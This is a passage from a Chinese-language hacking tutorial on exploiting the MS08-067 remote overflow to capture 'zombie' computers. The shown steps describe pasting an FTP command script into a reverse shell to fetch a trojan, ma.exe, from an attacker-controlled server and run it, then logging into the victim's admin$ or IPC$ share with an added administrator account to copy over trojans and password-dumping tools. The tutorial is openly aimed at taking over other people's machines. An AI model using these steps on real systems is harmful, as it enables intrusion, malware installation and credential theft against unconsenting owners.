利用MS08067远程溢出漏洞抓肉鸡

核心提示： 图5 添加一个用户到管理员组中7.上传文件关于上传文件有多种方法，个人推荐ftp脚本法，利用MS08067远程溢出漏洞抓肉鸡(4)，即在某一个站点或者自己假设一个临时Ftp服务器，然后使用以下样本下载ma.exe:echo open 218.*.*.* >b echo ftp>

图5 添加一个用户到管理员组中

7.上传文件

关于上传文件有多种方法，个人推荐ftp脚本法，即在某一个站点或者自己假设一个临时Ftp服务器，然后使用以下样本下载ma.exe:

echo open 218.*.*.* >b

echo ftp>>b

echo ftp>>b

echo bin>>b

echo get ma.exe>>b

echo bye>>b

ftp -s:b

del b

将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载，然后可以在反弹的Shell中执行下载的文件。在本次渗透过程中，由于是相邻IP，因此使用了一个简便的方法，即单击“开始”-“运行”，在其中输入“IPadmin$”或者“IPC$”并确定，如图6所示，如图能够连接，则会出现一个输入网络密码的提示框，在用户和密码中分别输入刚才添加的用户名。

图6打开网络连接

如果验证正确，则可以像使用资源管理器一样使用被溢出计算机所建立的磁盘连接，如图7所示，顺利打开该服务器上的C盘，然后将木马、获取系统密码、查看系统信息等工具软件直接复制过去即可。

图7打开被溢出服务器系统盘

8．获取系统详细信息以及执行各种命令